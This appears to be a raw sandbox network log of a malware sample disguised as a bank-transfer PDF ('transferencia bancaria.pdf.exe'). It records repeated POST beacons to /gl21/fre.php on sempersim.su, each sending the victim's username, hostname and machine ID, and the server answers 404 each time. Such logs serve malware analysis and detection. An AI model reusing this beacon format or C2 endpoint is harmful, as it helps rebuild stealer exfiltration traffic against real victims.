0	192.168.2.6	49706	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:09.785093069 CET	98	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 196 Connection: close
Nov 3, 2022 12:30:09.847696066 CET	98	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: 'ckav.ruengineer405464DESKTOP-716T771k08F9C4E9C79A3B52B3F739430m9tzQ
Nov 3, 2022 12:30:11.378333092 CET	99	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:10 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 15 Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49707	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:11.977904081 CET	99	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 196 Connection: close
Nov 3, 2022 12:30:12.040091991 CET	100	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: 'ckav.ruengineer405464DESKTOP-716T771+08F9C4E9C79A3B52B3F739430R25tl
Nov 3, 2022 12:30:13.686108112 CET	100	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:13 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 15 Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49716	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:32.992650986 CET	113	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:33.057817936 CET	113	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:34.572782040 CET	114	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:34 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49717	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:35.019959927 CET	114	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:35.081929922 CET	115	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:36.516442060 CET	115	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:36 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49718	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:37.003048897 CET	116	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:37.065248966 CET	116	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:37.371615887 CET	116	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:37.684214115 CET	117	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:38.293596983 CET	117	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:39.512592077 CET	117	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:41.067852974 CET	118	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:38 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49719	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:42.564459085 CET	119	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:42.856527090 CET	119	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:43.169044971 CET	119	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:43.841007948 CET	120	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:45.376826048 CET	120	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:45 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49720	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:45.793164968 CET	121	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:45.855376005 CET	121	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:46.207489014 CET	122	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:47.547245026 CET	122	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:46 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49721	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:48.032802105 CET	123	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:48.325807095 CET	123	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:48.638204098 CET	123	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:50.362963915 CET	124	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:49 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49722	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:50.822443962 CET	124	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:51.122917891 CET	125	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:51.438905001 CET	125	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:53.023996115 CET	126	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:52 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.6	49723	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:53.367985010 CET	126	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:53.430174112 CET	127	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:54.557574987 CET	127	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:54 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.6	49724	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:54.913990974 CET	128	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:55.216989040 CET	128	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:55.529526949 CET	129	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:56.139131069 CET	129	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:57.636605024 CET	129	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:57 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.6	49725	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:57.918358088 CET	130	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:57.981422901 CET	130	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:59.345747948 CET	131	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:59 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49708	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:14.035063982 CET	101	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:14.097431898 CET	101	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:15.684953928 CET	101	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:15 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.6	49726	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:59.657450914 CET	132	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:59.719604969 CET	132	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:00.653287888 CET	132	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:00 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.6	49727	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:01.987085104 CET	133	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
